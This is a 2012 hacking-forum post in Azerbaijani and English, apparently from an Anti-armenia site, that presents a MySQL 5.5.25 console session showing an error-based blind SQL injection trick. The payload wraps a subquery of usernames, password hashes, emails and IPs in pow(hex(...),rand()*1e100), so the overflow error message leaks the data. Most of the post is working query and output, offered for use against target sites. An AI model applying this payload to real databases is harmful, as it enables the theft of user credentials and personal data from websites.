Istifadəçi |
2012-08-27 19:43 GMT |
|
|
|
Pr0grammer |
|
Mesaj Sayı : 1678 |
Mövzu Sayı : |
Rep Ver : |
Rep Sayı : 62 |
Indi Saytda : |
Cinsiyyət : Oğlan |
|
Şəhər : KARABAKH IS AZERBAIJAN! |
Ölkə : |
Məslək : |
Yaş : |
Mesaj : |
|
Uzun sözün qıssası MYSQL 5.5.25 tapdığım+ (test etdiyim versiya bu olub)-da pow() funksiyasında bug və bug-a əsaslanaraq sadalanan mysql versiyada (yaxud bir qədər aşağı versiyalarda) ERROR BASED Blind Sql inject-də istifadə oluna bilinən metod.
Bir neçə şərtdən asılıdır.
Hədəf saytdakı table ENGINE MYISAM olmalıdır.
MYSQL server versiya 5.5.25 və bir qədər aşağı versiyalar olmalıdır.
Kod: Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 61
Server version: 5.5.25 MySQL Community Server (GPL)
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> \s
--------------
Connection id: 61
Current database:
Current user: root@localhost
SSL: Not in use
Using delimiter: ;
Server version: 5.5.25 MySQL Community Server (GPL)
Protocol version: 10
Connection: localhost via TCP/IP
Server characterset: latin1
Db characterset: latin1
Client characterset: latin1
Conn. characterset: latin1
TCP port: 3306
Uptime: 13 min 12 sec
Threads: 1 Questions: 184 Slow queries: 0 Opens: 42 Flush tables: 1 Open tables: 26 Queries per second avg: 0.232
--------------
mysql> select session_user() \g
+----------------+
| session_user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> show create database sed165 \G
*************************** 1. row ***************************
Database: sed165
Create Database: CREATE DATABASE `sed165` /*!40100 DEFAULT CHARACTER SET utf8 COLLATE utf8_unicode_ci */
1 row in set (0.00 sec)
mysql> use sed165 \g
Query OK, 0 rows affected (0.00 sec)
mysql> \s
--------------
Connection id: 61
Current database: sed165
Current user: root@localhost
SSL: Not in use
Using delimiter: ;
Server version: 5.5.25 MySQL Community Server (GPL)
Protocol version: 10
Connection: localhost via TCP/IP
Server characterset: latin1
Db characterset: utf8
Client characterset: latin1
Conn. characterset: latin1
TCP port: 3306
Uptime: 13 min 51 sec
Threads: 1 Questions: 196 Slow queries: 0 Opens: 42 Flush tables: 1 Open tables: 26 Queries per second avg: 0.235
--------------
mysql> show create table sed_users \G
*************************** 1. row ***************************
Table: sed_users
Create Table: CREATE TABLE `sed_users` (
`user_id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`user_banexpire` int(11) DEFAULT '0',
`user_name` varchar(24) NOT NULL DEFAULT '',
`user_password` varchar(32) NOT NULL DEFAULT '',
`user_maingrp` int(11) unsigned NOT NULL DEFAULT '4',
`user_country` char(2) NOT NULL DEFAULT '',
`user_text` text NOT NULL,
`user_avatar` varchar(255) NOT NULL DEFAULT '',
`user_photo` varchar(255) NOT NULL DEFAULT '',
`user_signature` varchar(255) NOT NULL DEFAULT '',
`user_extra1` varchar(255) NOT NULL DEFAULT '',
`user_extra2` varchar(255) NOT NULL DEFAULT '',
`user_extra3` varchar(255) NOT NULL DEFAULT '',
`user_extra4` varchar(255) NOT NULL DEFAULT '',
`user_extra5` varchar(255) NOT NULL DEFAULT '',
`user_extra6` text,
`user_extra7` text,
`user_extra8` text,
`user_extra9` text,
`user_occupation` varchar(64) NOT NULL DEFAULT '',
`user_location` varchar(64) NOT NULL DEFAULT '',
`user_timezone` varchar(32) NOT NULL DEFAULT '0',
`user_birthdate` int(11) NOT NULL DEFAULT '0',
`user_gender` char(1) NOT NULL DEFAULT 'U',
`user_irc` varchar(128) NOT NULL DEFAULT '',
`user_msn` varchar(64) NOT NULL DEFAULT '',
`user_icq` varchar(16) NOT NULL DEFAULT '',
`user_website` varchar(128) NOT NULL DEFAULT '',
`user_email` varchar(64) NOT NULL DEFAULT '',
`user_hideemail` tinyint(1) unsigned NOT NULL DEFAULT '1',
`user_pmnotify` tinyint(1) unsigned NOT NULL DEFAULT '0',
`user_newpm` tinyint(1) unsigned NOT NULL DEFAULT '0',
`user_skin` varchar(16) NOT NULL DEFAULT '',
`user_lang` varchar(16) NOT NULL DEFAULT '',
`user_regdate` int(11) NOT NULL DEFAULT '0',
`user_lastlog` int(11) NOT NULL DEFAULT '0',
`user_lastvisit` int(11) NOT NULL DEFAULT '0',
`user_lastip` varchar(16) NOT NULL DEFAULT '',
`user_logcount` int(11) unsigned NOT NULL DEFAULT '0',
`user_postcount` int(11) DEFAULT '0',
`user_sid` char(32) NOT NULL DEFAULT '',
`user_lostpass` char(32) NOT NULL DEFAULT '',
`user_auth` text,
PRIMARY KEY (`user_id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1
1 row in set (0.02 sec)
mysql> select count(0) from sed_users \g
+----------+
| count(0) |
+----------+
| 1 |
+----------+
1 row in set (0.00 sec)
mysql> select concat(useR_name,0x7c,user_password,0x7c,user_email,0x7c,user_lastip) from sed_users \g
+-----------------------------------------------------------------------+
| concat(useR_name,0x7c,user_password,0x7c,user_email,0x7c,user_lastip) |
+-----------------------------------------------------------------------+
| hacker|c4ca4238a0b923820dcc509a6f75849b|hacker@as.com|192.168.0.1 |
+-----------------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> # FUN BEGINS
mysql> select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100) \G
ERROR 1690 (22003): DOUBLE value is out of range in 'pow(hex((select concat_ws('hacker','c4ca4238a0b923820dcc509a6f75849b','hacker@as.com','192.168.0.1') from dual limit 1)),(rand() * 1e100))'
mysql> # NOTICE hacker c4ca4238a0b923820dcc509a6f75849b in error message
mysql> \c
mysql> # And Now we will try it on ENGINE=INNODB
mysql> \c
mysql> alter table sed_users ENGINE=INNODB \g
Query OK, 1 row affected (0.13 sec)
Records: 1 Duplicates: 0 Warnings: 0
mysql> select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100) \G
ERROR 1690 (22003): DOUBLE value is out of range in 'pow(hex((select concat_ws(`sed165`.`sed_users`.`user_name`,`sed165`.`sed_users`.`user_password`,`sed165`.`sed_users`.`user_email`,`sed165`.`sed_users`.`user_lastip`) from `sed165`.`sed_users` limit 1)),(rand() * 1e100))'
mysql> # CLEAN
mysql> # THE END #
mysql> \c
mysql> \q
can be usefull for Error based Blind Sql Injections.
Works on table if it's ENGINE=MYISAM
Tested ON: MYSQL 5.5.25 OS: (Windows XP 5.1.2600 Service Pack 2 Build 2600 ( Win32 ))
Have Fun.
/AkaStep
http://pastebin.com/QbBRf3WQ
|
Anti-armenia.ORG |
|